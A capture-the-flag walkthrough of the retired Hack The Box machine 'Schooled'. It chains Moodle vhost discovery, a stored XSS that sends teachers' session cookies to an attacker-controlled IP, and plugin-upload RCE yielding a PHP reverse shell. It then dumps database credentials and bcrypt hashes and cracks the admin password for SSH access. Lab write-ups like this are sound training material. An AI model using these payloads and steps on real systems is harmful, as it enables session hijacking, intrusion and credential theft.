Badge

Info

BoxName
IP10.10.10.234
OSFreeBSD
PwnedTrue
VulnerabilityStored XSS/Session Hijack/Priv Esc/RCE
Priv-escSudo NOPASSWD for pkg install
ObtainedN/A
RetiredTRUE

Cover

Recon

The box schooled is rated as a medium box. It’s based on the FreeBSD 13 and features two vhosts. One with a static website and other one with moodle version 3.9.0-beta.

Nmap

Basic nmap scan reveals only three services. But before we begin, let’s put the schooled.htb in /etc/hosts.

╰─○ sudo nmap -Pn -sC -sV -p- --script-timeout 30 schooled.htb -oA tcp_schooled -vv
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 19:24 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating SYN Stealth Scan at 19:24
Scanning schooled.htb (10.10.10.234) [65535 ports]
Discovered open port 22/tcp on 10.10.10.234
Discovered open port 80/tcp on 10.10.10.234
Increasing send delay for 10.10.10.234 from 0 to 5 due to max_successful_tryno increase to 4
SYN Stealth Scan Timing: About 8.04% done; ETC: 19:31 (0:05:54 remaining)
SYN Stealth Scan Timing: About 15.46% done; ETC: 19:31 (0:05:34 remaining)
Discovered open port 33060/tcp on 10.10.10.234
SYN Stealth Scan Timing: About 21.49% done; ETC: 19:32 (0:05:54 remaining)
SYN Stealth Scan Timing: About 42.49% done; ETC: 19:34 (0:05:30 remaining)
Increasing send delay for 10.10.10.234 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.234 from 10 to 20 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.10.234 from 20 to 40 due to 103 out of 341 dropped probes since last increase.
SYN Stealth Scan Timing: About 48.15% done; ETC: 19:36 (0:06:00 remaining)
SYN Stealth Scan Timing: About 51.20% done; ETC: 19:38 (0:06:35 remaining)
Stats: 0:11:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.02% done; ETC: 19:43 (0:07:11 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.80% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:24 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.82% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.84% done; ETC: 19:45 (0:06:58 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.85% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.86% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
Stats: 0:13:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.87% done; ETC: 19:45 (0:06:57 remaining)
SYN Stealth Scan Timing: About 74.32% done; ETC: 19:47 (0:05:56 remaining)
SYN Stealth Scan Timing: About 80.77% done; ETC: 19:49 (0:04:46 remaining)
SYN Stealth Scan Timing: About 86.52% done; ETC: 19:50 (0:03:31 remaining)
SYN Stealth Scan Timing: About 91.95% done; ETC: 19:51 (0:02:11 remaining)
SYN Stealth Scan Timing: About 96.94% done; ETC: 19:52 (0:00:51 remaining)
Completed SYN Stealth Scan at 19:53, 1723.51s elapsed (65535 total ports)
Initiating Service scan at 19:53
Scanning 3 services on schooled.htb (10.10.10.234)
Completed Service scan at 19:53, 14.23s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 1.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for schooled.htb (10.10.10.234)
Host is up, received user-set (0.038s latency).
Scanned at 2021-06-30 19:24:48 CEST for 1739s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY8PnQ2GFk9RrUQ82xGivlyXZ8k99JFZAFlNqJIftRHSGWL3HsfaO08lnGCrqVxj3235k0L74SJAqWfJs1ykTRipcZpsI5QvwYPyqpisMgH/SdCH1wehZpgaXRwdn52ob9+GxZ6qjqIon0cH0XR1hkNIGdbTt4RRMy+IfynzVuomW2mUi0tnnXU69pcyYNMShND4PqxVDKZHwUyeDIiYVBvnL5P9qEh0Q/t0HKWFHQ8otwWEpL3jnn774RFP9ETtZsJ/xosuhty02yIZuP6vqtbWfVqcqM8v1R3jm/xjXfXxiflGO09KO2aePAbEhNEofb7V/f33dRQDv5mr9ceZ1
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHc4TgrG+CyKqaIsk10XmAhUKULXK6Bq3bHHeJiWuBmdGS1k3Fp60OoVFdDKQj9aihkaUmbJ8fkG6dp07bm8IcM=
|   256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPWIP8gV7SGQNoODfYq9qg1k3j6ZZg+1L9zIU9FrHPaf
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
|_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx? syn-ack ttl 63
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 ser vice unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=6/30%Time=60DCAFA1%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\
SF:x08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20me
SF:ssage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAN
SF:Desk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRP
SF:C,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid
SF:\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10
SF:\x88'\x1a\x0fInvalid\x20message\"\x05HY000");
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1739.64 seconds
           Raw packets sent: 68026 (2.993MB) | Rcvd: 111199 (13.540MB)

Poking around

Three services are available. Two well known an updated http and a ssh server. There is also a mysterious 33060 port that is not being recognized by the scanner (multiplied by 10 3306 - default MySQL port?).

HTTP overview

Putting other services for later, the first one to be tried is of course a HTTP.

╰─○ curl -ksi http://schooled.htb
HTTP/1.1 200 OK
Date: Wed, 30 Jun 2021 19:43:48 GMT
Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
Last-Modified: Sat, 19 Dec 2020 17:23:57 GMT
ETag: "510e-5b6d47d6a6540"
Accept-Ranges: bytes
Content-Length: 20750
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
[...]

The server is Apache 2.4.48 running with PHP 7.4.15. And the address http://schooled.htb presents a static website

main

Further research shows that there is not much info there. Event the contact form /contact.html is not working properly (there is no such file as contact.php).

Natural thing to check in this case is to run a fuzzer against vhosts on the target server.

╰─○ gobuster vhost -u http://schooled.htb/ -w /usr/share/dirb/wordlists/common.txt -o subdomains_80_gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://schooled.htb/
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/dirb/wordlists/common.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/06/30 20:56:57 Starting gobuster in VHOST enumeration mode
===============================================================
Found: @.schooled.htb (Status: 400) [Size: 347]
Found: ~adm.schooled.htb (Status: 400) [Size: 347]
Found: ~admin.schooled.htb (Status: 400) [Size: 347]
Found: ~administrator.schooled.htb (Status: 400) [Size: 347]
Found: ~amanda.schooled.htb (Status: 400) [Size: 347]       
Found: ~apache.schooled.htb (Status: 400) [Size: 347]       
Found: ~bin.schooled.htb (Status: 400) [Size: 347]          
Found: ~ftp.schooled.htb (Status: 400) [Size: 347]          
Found: ~guest.schooled.htb (Status: 400) [Size: 347]        
Found: ~http.schooled.htb (Status: 400) [Size: 347]         
Found: ~nobody.schooled.htb (Status: 400) [Size: 347]       
Found: ~logs.schooled.htb (Status: 400) [Size: 347]         
Found: ~mail.schooled.htb (Status: 400) [Size: 347]         
Found: ~lp.schooled.htb (Status: 400) [Size: 347]           
Found: ~log.schooled.htb (Status: 400) [Size: 347]          
Found: ~httpd.schooled.htb (Status: 400) [Size: 347]        
Found: ~operator.schooled.htb (Status: 400) [Size: 347]     
Found: ~root.schooled.htb (Status: 400) [Size: 347]         
Found: ~sys.schooled.htb (Status: 400) [Size: 347]          
Found: ~sysadm.schooled.htb (Status: 400) [Size: 347]       
Found: ~sysadmin.schooled.htb (Status: 400) [Size: 347]     
Found: ~test.schooled.htb (Status: 400) [Size: 347]         
Found: ~user.schooled.htb (Status: 400) [Size: 347]         
Found: ~tmp.schooled.htb (Status: 400) [Size: 347]          
Found: ~www.schooled.htb (Status: 400) [Size: 347]          
Found: ~webmaster.schooled.htb (Status: 400) [Size: 347]    
Found: lost+found.schooled.htb (Status: 400) [Size: 347]    
Found: moodle.schooled.htb (Status: 200) [Size: 84]  

Given the fact that there is only one return code 200 the moodle software seems interesting.

moodle

There are four courses there and a login page, that might be used to login or register an account. The only one thing checked is the domain of the email address. It should be within the @student.schooled.htb

Unfortunately the student privilege is not enough to do something interesting within the moodle software. But the newly created student is able to enroll the Maths course.

The message from the lecturer says that he will be checking on the periodically to ensure that all students have filled in the MoodleNet part of their profile. The MoodleNet is a social media platform for educators.

Fortunately for us, there is a stored XSS vulnerability in the MoodleNet field inside students’ profile. This vuln is described here and as the commit shows it’s due to lack of sanitization of the userprofile field:

diff --git a/admin/tool/moodlenet/classes/profile_manager.php b/admin/tool/moodlenet/classes/profile_manager.php
index f1a922a..49027fd 100644 (file)
--- a/admin/tool/moodlenet/classes/profile_manager.php
+++ b/admin/tool/moodlenet/classes/profile_manager.php
@@ -46,7 +46,7 @@ class profile_manager {
             $user = \core_user::get_user($userid, 'moodlenetprofile');
             try {
                 $userprofile = $user->moodlenetprofile ? $user->moodlenetprofile : '';
-                return (isset($user)) ? new moodlenet_user_profile($userprofile, $userid) : null;
+                return (isset($user)) ? new moodlenet_user_profile(s($userprofile), $userid) : null;
             } catch (\moodle_exception $e) {
                 // If an exception is thrown, means there isn't a valid profile set. No need to log exception.
                 return null;
@@ -59,7 +59,7 @@ class profile_manager {
             if ($field->get_category_name() == self::get_category_name()
                     && $field->inputname == 'profile_field_mnetprofile') {
                 try {
-                    return new moodlenet_user_profile($field->display_data(), $userid);
+                    return new moodlenet_user_profile(s($field->display_data()), $userid);
                 } catch (\moodle_exception $e) {
                     // If an exception is thrown, means there isn't a valid profile set. No need to log exception.
                     return null;

Given the fact that the lecturer is checking students profiles it’s likely he will trigger the JS payload. This allows us to perform Session hijacking attack by stealing the MoodleSession cookie.

In my case the following XSS payload worked in the first try:

<script>new Image().src="http://IP/c.php?c="+document.cookie;</script>

xss

Setting up the listener (I’m using this python server script for logging GET/POST requests)

╰─○ sudo python3 server.py 80
INFO:root:Starting httpd...

INFO:root:GET request,
Path: /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v
Headers:
Host: 10.10.14.7
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=28



10.10.10.234 - - [30/Jun/2021 22:35:00] "GET /c.php?c=MoodleSession=3r6ht858ruacr94qjjlogs992v HTTP/1.1" 200 -

the cookie can be obtained. It allows to elevate privileges to teacher.

Foothold

In moodle version 3.9.0-Beta the RCE vulnerability exists. It might be triggered by the manager role to which the teacher can be elevated.

There are multiple ways to exploit it, but I’ve gone with the following exploit. This one didn’t work for me and I didn’t bother to fix it.

Used exploit has a downside - it can be triggered once, and then it doesn’t work anymore. So after few attempts to achieve reverse shell connection I gave up with the bash payloads (didn’t find python[3] either) and decided to change my strategy.

The vulnerability depends on uploading the plugin inside the zip archive. So I’ve changed the payload to the php reverse shell from here and then converted it to the base64 and put it back in the zip archive.

This allowed me to gain control as a www user

╰─○ sudo nc -nvlp 443 
[sudo] password for: 
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.234] 37349
FreeBSD Schooled 13.0-BETA3 FreeBSD 13.0-BETA3 #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/amd64.amd64/sys/GENERIC  amd64
 8:11PM  up  3:36, 0 users, load averages: 0.71, 0.48, 0.43
USER       TTY      FROM    LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off

On the system there are two users with the /home directory.

Priv Esc

Vertical priv esc

Information about the database used by the moodle can be obtained from config.php file.

$ cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8_unicode_ci',
);

$CFG->wwwroot   = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot  = '/usr/local/www/apache24/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

To connect to the database the mysql binary will be handy

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020
mysql: [Warning] Using a password on the command line interface can be insecure.
use moodle;
show tables;
Tables_in_moodle
[...]

Users are placed inside the mdl_user.

id  auth    confirmed   policyagreed    deleted suspended   mnethostid  username    password    idnumber    firstname   lastname    email   emailstop   icq skype   yahoo   aim msn phone1  phone2  institution department  address city    country lang    calendartype    theme   timezone    firstaccess lastaccess  lastlogin   currentlogin    lastip  secret  picture url description descriptionformat   mailformat  maildigest  maildisplay autosubscribe   trackforums timecreated timemodified    trustbitmask    imagealt    lastnamephonetic    firstnamephonetic   middlename  alternatename   moodlenetprofile
1   manual  1   0   0   0   1   guest   $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2        Guest user      root@localhost  0       en  gregorian       99  0   0   0   0           0   This user is a special user that allows read-only access to some courses.   1   1   02  1   0   0   1608320077  0   NULL    NULL    NULL    NULL    NULL    NULL
2   manual  1   0   0   0   1   admin   $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW        Jamie   Borham  jamie@staff.schooled.htb    0   Bournemouth GB  en  gregorian       99  1608320129  1608729680  1608681411  1608729680  192.168.1.14        0           1   1   00  1   0   0   1608389236  0                       
3   manual  1   0   0   0   1   bell_oliver89   $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK        Oliver  Bell    bell_oliver89@student.schooled.htb  0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608320808  1608320808  0       
4   manual  1   0   0   0   1   orchid_sheila89 $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC        Sheila  Orchid  orchid_sheila89@student.schooled.htb    0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608321097  1608321097  0       
5   manual  1   0   0   0   1   chard_ellzabeth89   $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC        Elizabeth   Chard   chard_elizabeth89@student.schooled.htb  0                               Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608321183  1608321183  0       
6   manual  1   0   0   0   1   morris_jake89   $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy        Jake    Morris  morris_jake89@student.schooled.htb  0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608380798  1608380798  0       
7   manual  1   0   0   0   1   heel_james89    $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim        James   Heel    heel_james89@student.schooled.htb   0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608380861  1608380861  0       
8   manual  1   0   0   0   1   nash_michael89  $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu        Michael Nash    nash_michael89@student.schooled.htb 0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608380931  1608380931  0       
9   manual  1   0   0   0   1   singh_rakesh89  $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu        Rakesh  Singh   singh_rakesh89@student.schooled.htb 0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381002  1608381002  0       
10  manual  1   0   0   0   1   taint_marcus89  $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa        Marcus  Taint   taint_marcus89@student.schooled.htb 0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381073  1608381073  0       
11  manual  1   0   0   0   1   walls_shaun89   $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga        Shaun   Walls   walls_shaun89@student.schooled.htb  0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381128  1608381128  0       
12  manual  1   0   0   0   1   smith_john89    $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em        John    Smith   smith_john89@student.schooled.htb   0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381193  1608381193  0       
13  manual  1   0   0   0   1   white_jack89    $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK        Jack    White   white_jack89@student.schooled.htb   0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381255  1608381255  0       
14  manual  1   0   0   0   1   travis_carl89   $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S        Carl    Travis  travis_carl89@student.schooled.htb  0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381313  1608381313  0       
15  manual  1   0   0   0   1   mac_amy89   $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i        Amy Mac mac_amy89@student.schooled.htb0                                         Bournemouth GB  en  gregorian       99  0   0   0   0       01  1   0   2   1   0   1608381361  1608381361  0       
16  manual  1   0   0   0   1   james_boris89   $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq        Boris   James   james_boris89@student.schooled.htb  0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381410  1608381410  0       
17  manual  1   0   0   0   1   pierce_allan    $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy        Allan   Pierce  pierce_allan89@student.schooled.htb 0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381478  1608381478  0       
18  manual  1   0   0   0   1   henry_william89 $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu        William Henry   henry_william89@student.schooled.htb    0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381530  1608381530  0       
19  manual  1   0   0   0   1   harper_zoe89    $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy        Zoe Harper  harper_zoe89@student.schooled.htb   0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381592  1608381592  0       
20  manual  1   0   0   0   1   wright_travis89 $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm        Travis  Wright  wright_travis89@student.schooled.htb    0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381677  1608381677  0       
21  manual  1   0   0   0   1   allen_matthew89 $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq        Matthew Allen   allen_matthew89@student.schooled.htb    0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381732  1608381732  0       
22  manual  1   0   0   0   1   sanders_wallis89    $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u        Wallis  Sanders sanders_wallis89@student.schooled.htb   0                                       Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608381797  1608381797  0       
23  manual  1   0   0   0   1   higgins_jane    $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2        Jane    Higgins higgins_jane@staff.schooled.htb 0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608382421  1608382421  0       
24  manual  1   0   0   0   1   phillips_manuel $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG        Manuel  Phillips    phillips_manuel@staff.schooled.htb  0                                       Bournemouth GB  en  gregorian       99  1608681510  1625080530  1625080405  1625080530  127.0.0.1       0           1   1   02  1   0   1608382537  1608681490  0                   
25  manual  1   0   0   0   1   carter_lianne   $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe        Lianne  Carter  carter_lianne@staff.schooled.htb    0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   01  1   0   2   1   0   1608382633  1608382633  0       
26  email   0   0   0   0   1   parker_dan89    $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi        Dan Parker  parker_dan89@student.schooled.htb   0                                           Bournemouth GB  en  gregorian       99  0   0   0   0   6IwNTLYu1F22aFR 0       NULL    1   1   0   2   1   0   160

There are some staff members, and the administrator of this moodle instance probably is also a user on the box. So I’ve tried to crack $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW hash.

╰─○ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:21 0,03% (ETA: 16:00:37) 0g/s 284.2p/s 284.2c/s 284.2C/s april20..coolchick
0g 0:00:00:22 0,04% (ETA: 16:02:33) 0g/s 283.0p/s 283.0c/s 283.0C/s sydney1..hotness
!QAZ2wsx         (?)
1g 0:00:00:53 DONE (2021-06-30 23:06) 0.01869g/s 260.4p/s 260.4c/s 260.4C/s 110689..kuuipo
Use the "--show" option to display all of the cracked passwords reliably

Using this password I was able to connect using ssh.

╰─○ ssh jamie@schooled.htb
Password for jamie@Schooled:
Last login: Tue Mar 16 14:44:53 2021 from 10.10.14.5
FreeBSD 13.0-BETA3 (GENERIC) #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
